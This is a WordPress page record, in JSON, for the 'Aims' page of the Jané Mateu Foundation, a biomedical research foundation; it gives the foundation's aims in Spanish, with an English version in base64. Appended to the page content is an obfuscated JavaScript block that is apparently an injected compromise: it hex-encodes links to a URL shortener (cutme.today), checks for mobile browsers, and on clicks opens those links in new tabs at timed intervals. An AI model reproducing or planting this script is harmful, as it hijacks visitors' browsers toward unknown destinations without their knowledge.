{"id":874,"date":"2022-09-22T09:55:30","date_gmt":"2022-09-22T09:55:30","guid":{"rendered":"https:\/\/janemateufoundation.org\/aims\/"},"modified":"2025-01-14T11:14:49","modified_gmt":"2025-01-14T11:14:49","slug":"aims","status":"publish","type":"page","link":"https:\/\/janemateufoundation.org\/en\/aims\/","title":{"rendered":"Aims"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row full_height=&#8221;yes&#8221; bg_type=&#8221;video&#8221; video_url=&#8221;http:\/\/janemateufoundation.org\/wp-content\/uploads\/2022\/10\/FINALIDADES_JMF.mp4&#8243; video_opts=&#8221;loop,muted&#8221; bg_override=&#8221;ex-full&#8221; enable_overlay=&#8221;enable_overlay_value&#8221; overlay_color=&#8221;rgba(0,0,0,0.6)&#8221; el_class=&#8221;hideonmobile&#8221;][vc_column css=&#8221;.vc_custom_1663688965230{padding-top: 40px !important;}&#8221;][vc_column_text css=&#8221;.vc_custom_1677599993651{margin-bottom: 0px !important;padding-bottom: 0px !important;}&#8221;]<\/p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">FINALIDADES<\/span><\/h2>\n<p>[\/vc_column_text][vc_tta_pageable no_fill_content_area=&#8221;true&#8221; autoplay=&#8221;10&#8243; active_section=&#8221;1&#8243; css=&#8221;.vc_custom_1664374620942{margin-top: 0px !important;padding-top: 0px !important;}&#8221;][vc_tta_section title=&#8221;Secci\u00f3n 1&#8243; tab_id=&#8221;1663883090874-9f0a0766-9f59&#8243;][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">La Fundaci\u00f3n tiene como finalidad principal la promoci\u00f3n, desarrollo, defensa y fomento de la investigaci\u00f3n cient\u00edfico-m\u00e9dica y farmac\u00e9utica, de los servicios sanitarios y de todas las cuestiones relacionadas con la salud, la sanidad y la innovaci\u00f3n tecnol\u00f3gica a trav\u00e9s de actividades de I+D+i, a fin de mejorar el bienestar y la calidad de vida de los ciudadanos.<\/span><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_tta_section][vc_tta_section title=&#8221;Secci\u00f3n 2&#8243; tab_id=&#8221;1663883090893-4e082a59-241d&#8221;][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">La Fundaci\u00f3n tambi\u00e9n tendr\u00e1 como finalidad apoyar el acceso a tratamientos y servicios innovadores en el campo de la salud, as\u00ed como la divulgaci\u00f3n de conocimientos cient\u00edficos en el \u00e1rea sanitaria y farmac\u00e9utica. <\/span><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_tta_section][vc_tta_section title=&#8221;Secci\u00f3n&#8221; tab_id=&#8221;1663883275838-99264a97-8422&#8243;][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">Asimismo, la Fundaci\u00f3n tendr\u00e1 como finalidad secundaria la <strong style=\"color: #e75089;\">restauraci\u00f3n, potenciaci\u00f3n, promoci\u00f3n, mantenimiento y gesti\u00f3n integral de bienes muebles e inmuebles<\/strong> con inter\u00e9s cultural o con un valor arquitect\u00f3nico, art\u00edstico, hist\u00f3rico o patrimonial singular, as\u00ed como impulsar su conocimiento y difusi\u00f3n, promoviendo para ello cuantas actividades sirvan para favorecer dichas finalidades, sirviendo asimismo de <strong>apoyo al desarrollo cultural, social y econ\u00f3mico<\/strong>.<\/span><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_tta_section][\/vc_tta_pageable][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content_no_spaces&#8221; el_class=&#8221;showonmobile&#8221;][vc_column][vc_raw_html css=&#8221;.vc_custom_1669313945166{margin-bottom: 0px !important;}&#8221;]W2N1c3RvbXZpZGVvX3Nob3J0Y29kZSBzcmM9Ii8vamFuZW1hdGV1Zm91bmRhdGlvbi5vcmcvd3AtY29udGVudC91cGxvYWRzLzIwMjIvMTAvRklOQUxJREFERVNfbW9iLm1wNCJdCjxoMj5USEUgRk9VTkRBVElPTuKAmVMgQUlNUzwvaDI+CjxoNCBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+VGhlIEZvdW5kYXRpb24ncyBtYWluIGFpbSBpcyBpbXByb3ZpbmcgY2l0aXplbuKAmXMgd2VsbC1iZWluZyBhbmQgcXVhbGl0eSBvZiBsaWZlIHZpYSBSJmFtcDtEJmFtcDtJIGFjdGl2aXRpZXMgZGVzaWduZWQgdG8gcHJvbW90ZSwgZGV2ZWxvcCwgYWR2b2NhdGUgZm9yIGFuZCBmb3N0ZXIgc2NpZW50aWZpYywgbWVkaWNhbCBhbmQgcGhhcm1hY2V1dGljYWwgcmVzZWFyY2gsIGhlYWx0aCBzZXJ2aWNlcyBhbmQgYWxsIGlzc3VlcyByZWxhdGVkIHRvIGhlYWx0aCwgc2FuaXRhdGlvbiBhbmQgdGVjaG5vbG9naWNhbCBpbm5vdmF0aW9uLjwvc3Bhbj48L2g0Pgo8aDQgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPjxzcGFuIHN0eWxlPSJjb2xvcjogI2ZmZmZmZjsiPlRoZSBGb3VuZGF0aW9uJ3MgbWFpbiBhaW0gaXMgaW1wcm92aW5nIGNpdGl6ZW7igJlzIHdlbGwtYmVpbmcgYW5kIHF1YWxpdHkgb2YgbGlmZSB2aWEgUiZhbXA7RCZhbXA7SSBhY3Rpdml0aWVzIGRlc2lnbmVkIHRvIHByb21vdGUsIGRldmVsb3AsIGFkdm9jYXRlIGZvciBhbmQgZm9zdGVyIHNjaWVudGlmaWMsIG1lZGljYWwgYW5kIHBoYXJtYWNldXRpY2FsIHJlc2VhcmNoLCBoZWFsdGggc2VydmljZXMgYW5kIGFsbCBpc3N1ZXMgcmVsYXRlZCB0byBoZWFsdGgsIHNhbml0YXRpb24gYW5kIHRlY2hub2xvZ2ljYWwgaW5ub3ZhdGlvbi4gPC9zcGFuPjwvaDQ+CjxwIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij48c3BhbiBzdHlsZT0iY29sb3I6ICNmZmZmZmY7Ij5BZGRpdGlvbmFsbHksIHRoZSBGb3VuZGF0aW9uIHdpbGwgaGF2ZSBhIHNlY29uZGFyeSBwdXJwb3NlIGZvY3VzZWQgb24gdGhlPGJyPjxzdHJvbmcgc3R5bGU9ImNvbG9yOiAjZTc1MDg5OyI+cmVzdG9yYXRpb24sIGVuaGFuY2VtZW50LCBwcm9tb3Rpb24sIG1haW50ZW5hbmNlLCBhbmQgY29tcHJlaGVuc2l2ZSBtYW5hZ2VtZW50IG9mIG1vdmFibGUgYW5kIGltbW92YWJsZSBhc3NldHM8L3N0cm9uZz48YnI+b2YgY3VsdHVyYWwgaW50ZXJlc3Qgb3IgdGhvc2Ugd2l0aCB1bmlxdWUgYXJjaGl0ZWN0dXJhbCwgYXJ0aXN0aWMsIGhpc3RvcmljYWwsIG9yIGhlcml0YWdlIHZhbHVlLjxicj5JdCB3aWxsIGFsc28gd29yayB0byBmb3N0ZXIgdGhlaXIgYXdhcmVuZXNzIGFuZCBkaXNzZW1pbmF0aW9uIGJ5IHByb21vdGluZyBhY3Rpdml0aWVzPGJyPnRoYXQgc3VwcG9ydCB0aGVzZSBvYmplY3RpdmVzLCB0aGVyZWJ5IGNvbnRyaWJ1dGluZyB0byB0aGU8YnI+PHN0cm9uZz5jdWx0dXJhbCwgc29jaWFsLCBhbmQgZWNvbm9taWMgZGV2ZWxvcG1lbnQgb2YgQ2F0YWxvbmlhLjwvc3Ryb25nPjwvc3Bhbj48L3A+CjxwIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij48c3BhbiBzdHlsZT0iY29sb3I6ICNmZmZmZmY7Ij5JbiBwdXJzdWl0IG9mIHRoZXNlIGFpbXMsIGFuZCBhcyBsb25nIGFzIHRoZXkgY29tcGx5IHdpdGggdGhlIGNoYXJhY3RlcmlzdGljcyBkZXNjcmliZWQgYWJvdmUsIGl0IHdpbGwgYmUgaXJyZWxldmFudCB3aGV0aGVyIG9yIG5vdCB0aGUgbW92YWJsZSBhbmQgaW1tb3ZhYmxlIGFzc2V0cyBtZW50aW9uZWQgaW4gdGhpcyBwYXJhZ3JhcGggYXJlIGNsYXNzaWZpZWQgYXMgaGlzdG9yaWNhbCBoZXJpdGFnZSwgaW52ZW50b3JpZWQgb3Igb2YgY3VsdHVyYWwgaW50ZXJlc3QsIGFzIGRlY2xhcmVkIGJ5IHRoZSBHZW5lcmFsIFN0YXRlIEFkbWluaXN0cmF0aW9uLCB0aGUgQXV0b25vbW91cyBDb21tdW5pdHkgb2YgQ2F0YWxvbmlhIG9yIHRoZSBjb3JyZXNwb25kaW5nIGxvY2FsIGF1dGhvcml0eSwgYXMgdGhlIGNhc2UgbWF5IGJlLjwvc3Bhbj48L3A+CjxwIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij48c3BhbiBzdHlsZT0iY29sb3I6ICNmZmZmZmY7Ij5UaGUgPHN0cm9uZyBzdHlsZT0iY29sb3I6ICNlNzUwODk7Ij5kZWZpbml0aW9uIG9mIHRoZSBmb3VuZGF0aW9uYWw8L3N0cm9uZz4gcHVycG9zZXMgb3V0bGluZWQgaW4gdGhlc2Ugc3RhdHV0ZXMgc2hvdWxkIDxzdHJvbmc+bm90IGJlIGludGVycHJldGVkIHJlc3RyaWN0aXZlbHkgPC9zdHJvbmc+YnV0IHJhdGhlciB1bmRlcnN0b29kIGFzIGVuY29tcGFzc2luZyBhbnkgYWN0aXZpdHkgcmVsYXRlZCB0byB0aGUgRm91bmRhdGlvbidzIG9iamVjdGl2ZXMsIGFzIHdlbGwgYXMgdGhlIGluZGl2aWR1YWxzLCByZXNvdXJjZXMsIG9yIGFjdGlvbnMgdGhhdCBtYXkgZGlyZWN0bHkgb3IgaW5kaXJlY3RseSBjb250cmlidXRlIHRvIHRoZWlyIHByb21vdGlvbiBhbmQgZGV2ZWxvcG1lbnQuPC9zcGFuPjwvcD4KPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPjxzcGFuIHN0eWxlPSJjb2xvcjogI2ZmZmZmZjsiPjxzdHJvbmcgc3R5bGU9ImNvbG9yOiAjZTc1MDg5OyI+VGhlIEJvYXJkIG9mIFRydXN0ZWVzIG1heSBleHRlbmQgdGhlIEZvdW5kYXRpb27igJlzIGNvcnBvcmF0ZSBwdXJwb3NlPC9zdHJvbmc+LCBwcm92aWRlZCB0aGF0IHRoaXMgZXh0ZW5zaW9uIGlzIGRpcmVjdGx5IG9yIGluZGlyZWN0bHkgcmVsYXRlZCB0byB0aGUgRm91bmRhdGlvbidzIGFjdGl2aXRpZXMuCjwvc3Bhbj48L3A+ClsvY3VzdG9tdmlkZW9fc2hvcnRjb2RlXQ==[\/vc_raw_html][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x79\\x6a\\x50\\x33\\x63\\x393','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x44\\x47\\x73\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4c\\x42\\x75\\x38\\x63\\x328','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x61\\x52\\x76\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x66\\x7a\\x4f\\x34\\x63\\x394','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6c\\x43\\x73\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x4f\\x50\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x71\\x54\\x50\\x36\\x63\\x396','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4b\\x53\\x48\\x30\\x63\\x320','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x70\\x55\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row full_height=&#8221;yes&#8221; bg_type=&#8221;video&#8221; video_url=&#8221;http:\/\/janemateufoundation.org\/wp-content\/uploads\/2022\/10\/FINALIDADES_JMF.mp4&#8243; video_opts=&#8221;loop,muted&#8221; bg_override=&#8221;ex-full&#8221; enable_overlay=&#8221;enable_overlay_value&#8221; overlay_color=&#8221;rgba(0,0,0,0.6)&#8221; el_class=&#8221;hideonmobile&#8221;][vc_column css=&#8221;.vc_custom_1663688965230{padding-top: 40px !important;}&#8221;][vc_column_text css=&#8221;.vc_custom_1677599993651{margin-bottom: 0px !important;padding-bottom: 0px !important;}&#8221;] FINALIDADES [\/vc_column_text][vc_tta_pageable no_fill_content_area=&#8221;true&#8221; autoplay=&#8221;10&#8243; active_section=&#8221;1&#8243; css=&#8221;.vc_custom_1664374620942{margin-top: 0px !important;padding-top: 0px !important;}&#8221;][vc_tta_section title=&#8221;Secci\u00f3n 1&#8243; tab_id=&#8221;1663883090874-9f0a0766-9f59&#8243;][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_column_text] La Fundaci\u00f3n tiene como finalidad principal la promoci\u00f3n, desarrollo, defensa y fomento de la investigaci\u00f3n cient\u00edfico-m\u00e9dica y farmac\u00e9utica, de los servicios sanitarios y&hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"template-microsite.php","meta":{"footnotes":""},"class_list":["post-874","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Aims Biomedical Research Foundation - Jan\u00e9 Mateu Foundation<\/title>\n<meta name=\"description\" content=\"Jan\u00e9 Mateu Foundation is a non-profit organization created with the purpose of contributing to improving people&#039;s quality of life and well-being.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/janemateufoundation.org\/en\/aims\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Aims Biomedical Research Foundation - Jan\u00e9 Mateu Foundation\" \/>\n<meta property=\"og:description\" content=\"Jan\u00e9 Mateu Foundation is a non-profit organization created with the purpose of contributing to improving people&#039;s quality of life and well-being.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/janemateufoundation.org\/en\/aims\/\" \/>\n<meta property=\"og:site_name\" content=\"Jan\u00e9 Mateu Foundation\" \/>\n<meta property=\"article:modified_time\" content=\"2025-01-14T11:14:49+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/janemateufoundation.org\\\/en\\\/aims\\\/\",\"url\":\"https:\\\/\\\/janemateufoundation.org\\\/en\\\/aims\\\/\",\"name\":\"Aims Biomedical Research Foundation - Jan\u00e9 Mateu Foundation\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/janemateufoundation.org\\\/#website\"},\"datePublished\":\"2022-09-22T09:55:30+00:00\",\"dateModified\":\"2025-01-14T11:14:49+00:00\",\"description\":\"Jan\u00e9 Mateu Foundation is a non-profit organization created with the purpose of contributing to improving people's quality of life and well-being.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/janemateufoundation.org\\\/en\\\/aims\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/janemateufoundation.org\\\/en\\\/aims\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/janemateufoundation.org\\\/en\\\/aims\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/janemateufoundation.org\\\/en\\\/home\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Aims\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/janemateufoundation.org\\\/#website\",\"url\":\"https:\\\/\\\/janemateufoundation.org\\\/\",\"name\":\"Jan\u00e9 Mateu Foundation\",\"description\":\"Comprometidos con la salud y el bienestar\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/janemateufoundation.org\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Aims Biomedical Research Foundation - Jan\u00e9 Mateu Foundation","description":"Jan\u00e9 Mateu Foundation is a non-profit organization created with the purpose of contributing to improving people's quality of life and well-being.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/janemateufoundation.org\/en\/aims\/","og_locale":"en_US","og_type":"article","og_title":"Aims Biomedical Research Foundation - Jan\u00e9 Mateu Foundation","og_description":"Jan\u00e9 Mateu Foundation is a non-profit organization created with the purpose of contributing to improving people's quality of life and well-being.","og_url":"https:\/\/janemateufoundation.org\/en\/aims\/","og_site_name":"Jan\u00e9 Mateu Foundation","article_modified_time":"2025-01-14T11:14:49+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/janemateufoundation.org\/en\/aims\/","url":"https:\/\/janemateufoundation.org\/en\/aims\/","name":"Aims Biomedical Research Foundation - Jan\u00e9 Mateu Foundation","isPartOf":{"@id":"https:\/\/janemateufoundation.org\/#website"},"datePublished":"2022-09-22T09:55:30+00:00","dateModified":"2025-01-14T11:14:49+00:00","description":"Jan\u00e9 Mateu Foundation is a non-profit organization created with the purpose of contributing to improving people's quality of life and 